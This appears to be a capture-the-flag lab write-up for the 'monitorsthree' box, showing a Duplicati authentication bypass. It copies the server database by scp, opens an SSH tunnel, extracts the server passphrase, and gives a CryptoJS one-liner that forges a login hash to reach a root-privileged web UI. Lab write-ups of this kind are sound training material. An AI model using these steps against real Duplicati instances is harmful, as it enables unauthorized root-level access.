Duplicati


www-data@monitorsthree:/opt$ ll
total 24K
4.0K drwxr-xr-x 18 root root 4.0K Aug 19 13:00 ..
4.0K drwxr-xr-x  5 root root 4.0K Aug 18 08:00 .
4.0K drwxr-xr-x  3 root root 4.0K Aug 18 08:00 duplicati
4.0K -rw-r--r--  1 root root  318 May 26 16:08 docker-compose.yml
4.0K drwxr-xr-x  3 root root 4.0K May 20 15:53 backups
4.0K drwx--x--x  4 root root 4.0K May 20 14:38 containerd

There appears to be an instance of Duplicati. It was initially suspected because of the listening internal port 8200 and was confirmed by PEAS.

Duplicati is a backup client that securely stores encrypted, incremental, compressed remote backups of local files on cloud storage services and remote file servers. Duplicati supports not only various online backup services like OneDrive, Amazon S3, Backblaze, Rackspace Cloud Files, Tahoe LAFS, and Google Drive, but also any servers that support SSH/SFTP, WebDAV, or FTP.

www-data@monitorsthree:/opt$ cat docker-compose.yml
version: "3"
 
services:
  duplicati:
    image: lscr.io/linuxserver/duplicati:latest
    container_name: duplicati
    environment:
      - PUID=0
      - PGID=0
      - TZ=Etc/UTC
    volumes:
      - /opt/duplicati/config:/config
      - /:/source
    ports:
      - 127.0.0.1:8200:8200
    restart: unless-stopped

Checking the docker-compose.yml file reveals the details: the container runs with PUID=0 and PGID=0, the host's root filesystem is mounted into it at /source, and the web UI is bound only to 127.0.0.1:8200, which is why it was only visible as an internal port.

www-data@monitorsthree:/opt/duplicati/config$ ll
total 2.7M
4.0K drwxr-xr-x 4 root root 4.0K Aug 25 11:00 .
 88K -rw-r--r-- 1 root root  88K Aug 25 11:00 Duplicati-server.sqlite
2.6M -rw-r--r-- 1 root root 2.6M Aug 25 11:00 CTADPNHLTC.sqlite
4.0K drwxr-xr-x 3 root root 4.0K Aug 18 08:00 .config
4.0K drwxr-xr-x 2 root root 4.0K Aug 18 08:00 control_dir_v2
4.0K drwxr-xr-x 3 root root 4.0K Aug 18 08:00 ..

The config directory contains the server database, Duplicati-server.sqlite, and it is world-readable (-rw-r--r--).

┌──(kali㉿kali)-[~/archive/htb/labs/monitorsthree]
└─$ scp -i id_rsa.marcus marcus@monitorsthree.htb:/opt/duplicati/config/Duplicati-server.sqlite .
Duplicati-server.sqlite                                                                               100%   88KB 748.6KB/s   00:00    

Downloading the DB file to Kali via scp

SSH Tunneling


┌──(kali㉿kali)-[~/archive/htb/labs/monitorsthree]
└─$ ssh -L 8200:127.0.0.1:8200 marcus@monitorsthree.htb -N -f -i ./id_rsa.marcus

Forwarding the target's port 8200 to the Kali socket 127.0.0.1:8200 through an SSH tunnel

Web


It’s a login page

Authentication Bypass


Searching online for Duplicati authentication bypasses turns up a fairly recent article showcasing the technique.

Intercepting a login request, I grab the value of the Nonce parameter.

┌──(kali㉿kali)-[~/archive/htb/labs/monitorsthree]
└─$ open Duplicati-server.sqlite

Opening up the DB file with DB Browser

The Option table contains a server-passphrase entry; its value is the secret.

┌──(kali㉿kali)-[~/archive/htb/labs/monitorsthree]
└─$ echo Wb6e855L3sN9LTaCuwPXuautswTIQbekmMAr7BrK2Ho= | base64 -d | xxd -p | tr -d '\n'
59be9ef39e4bdec37d2d3682bb03d7b9abadb304c841b7a498c02bec1acad87a

Decoding the base64 secret and converting it to hex

// base64-decoded nonce bytes (WordArray renders as hex) concatenated with the hex secret, parsed back to bytes, SHA-256'd, output as base64
var noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse('xRDaZ+AkkbhlYRarQy4JEgcG0eSlftHpcfKEzVU/nxo=') + '59be9ef39e4bdec37d2d3682bb03d7b9abadb304c841b7a498c02bec1acad87a')).toString(CryptoJS.enc.Base64);

Using the browser's built-in console, I can generate a valid noncedpwd, which is nsIpycc6Vtfkmv+EyGMBwsf1d6VVI+dA5UXBsRHn8Es=

URL-Encoding the newly generated noncedpwd

Authentication bypassed successfully. Because the container runs with PUID=0 and PGID=0, the Duplicati instance is running with the privileges of the root account. Moving on to privilege escalation.